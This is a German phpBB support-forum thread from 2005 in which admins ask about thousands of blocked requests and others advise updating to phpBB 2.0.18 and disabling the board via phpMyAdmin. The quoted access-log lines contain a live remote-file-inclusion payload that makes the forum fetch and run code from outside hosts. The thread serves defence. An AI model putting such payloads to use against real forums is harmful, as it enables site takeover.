Seite 1 von 1
Was für eine Attacke kann denn das ein?
Verfasst: 08.11.2005 13:31
von Wolfgang67
Seit gestern hatte ich mehrere tausend Aufrufe die mit einer 403 abgewiesen wurden. Was geht da vor und was kann man dagegen tun?
Hier ein Auszug aus meinem Log:
Code: Alles auswählen
- [08/Nov/2005:00:02:16 +0100] "GET /viewtopic.php?t=605&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.dps-ct.com/home/customerupload/phpbb_patch?& HTTP/1.0" 403 288 "-" "Mozilla/4.0" "www.funkart-forum.de"
209.126.144.27 -
- [08/Nov/2005:00:02:18 +0100] "GET /viewtopic.php?p=4181&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.austria101.server4free.de/phpbb_patch?& HTTP/1.0" 403 288 "-" "Mozilla/4.0" "www.funkart-forum.de"
207.226.22.176 -
Adresse des Forums ist
www.funkart-forum.de
Gruß Wolfgang
Verfasst: 08.11.2005 14:10
von hintzsche
was ich bis jetzt herausgefunden habe ist das mozilla/4.0 ein Opera 6 browser getarnt als msie5 ist benutzt du eine css weiche?
Verfasst: 08.11.2005 14:50
von Wolfgang67
Da ich keine Ahnung habe was eine CSS Weiche ist, nehme ich mal an, dass ich keine benutze.
Ich hab gehosteten Webspace bei hosteurope, keinen eigenen Server.
Nutzt es, wenn ich eine größere Portion aus meinem Log hier einstelle?
tausend Aufrufe von http://www.austria101.server4free.de
Verfasst: 20.12.2005 12:54
von itebob
Hallo,
Wolfgang67 hat geschrieben:Seit gestern hatte ich mehrere tausend Aufrufe die mit einer 403 abgewiesen wurden.
Habe ich auch tausend Aufrufe mit dem gleichen Datum entdeckt. Hast du inzwischen mehr in Erfahrung gebracht? Ich habe den Ärger, dass sich in meinem Forum etliche Spammitglieder eingenistet haben. Und da ich die gleiche Probleme, wie im Thread
Admin Zugang; auf einmal nicht möglich! beschrieben, habe, kann ich diese Mitglieder nicht einmal löschen
Vielleicht gibt es einen Zusammenhang zwischen dieser Attacke und den Spammmitgliedern?
Verfasst: 20.12.2005 13:12
von IPB_Flüchtling
Ist ein Versuch, eine ehemalige Sicherheitslücke von phpbb auszunutzen. Wenn Ihr nach highlight 2527 sucht, findet Ihr z.B.
diesen Thread.
Wenn Ihr 2.0.18 habt, seid Ihr auf der sicheren Seite. Zusätzlich sollte der CrackerTracker (Link in meiner Signatur) installiert sein.
LG, IPB_Flüchtling
Verfasst: 20.12.2005 15:32
von itebob
@IPB_Flüchtling
> Ist ein Versuch, eine ehemalige Sicherheitslücke von phpbb auszunutzen.
Sieht so aus, dass der Versuch erfolgreich war - ich kann mich als Admin nicht einloggen
. Gibt es allgemeingültige Empfehlungen, was ein Admin zu machen hat, bevor man auf 2.0.18 updated? Oder ist mit dem Update ein Einloggen automatisch möglich?
Verfasst: 20.12.2005 16:07
von IPB_Flüchtling
Hast Du wirklich noch ein 2.0.4, wie in der Signatur steht? Dann würde ich tatsächlich dringend empfehlen, upzudaten!
Geht auch ganz leicht:
1. Board deaktivieren.
2. Alle Dateien außer der config.php durch die entsprechenden 2.0.18-Dateien ersetzen.
3. Die Datei update_to_latest.php ausführen, um die Datenbank auf den neuesten Stand zu bringen.
4. Board wieder aktivieren.
Alle Mods müssen dann halt neu eingebaut werden. Das geht aber viel schneller, als von 2.0.4 auf 2.0.18 manuell upzudaten.
Wenn Du wirklich gecrackt worden bist, solltest Du Dir den ersten Link in meiner Signatur näher ansehen.
LG, IPB_Flüchtling
Verfasst: 20.12.2005 17:24
von itebob
> 1. Board deaktivieren.
...
> 4. Board wieder aktivieren.
wenn ich mich als Admin nicht anmelden kann, dann wird dies über MyAdmin-Oberfläche gemacht?
Danke für die hilfreiche Tips! Übrigens das vermutlich gecracktes Forum ist
http://forum.selfcms.de
Verfasst: 20.12.2005 17:38
von IPB_Flüchtling
Hallo itebob,
mach es über phpMyAdmin:
http://www.phpbb.de/doku/kb/search.php? ... phpmyadmin
Du brauchst dann nur im Feld phpbb_config in der Zeile board_disable den Wert von 0 auf 1 setzen.
LG, IPB_Flüchtling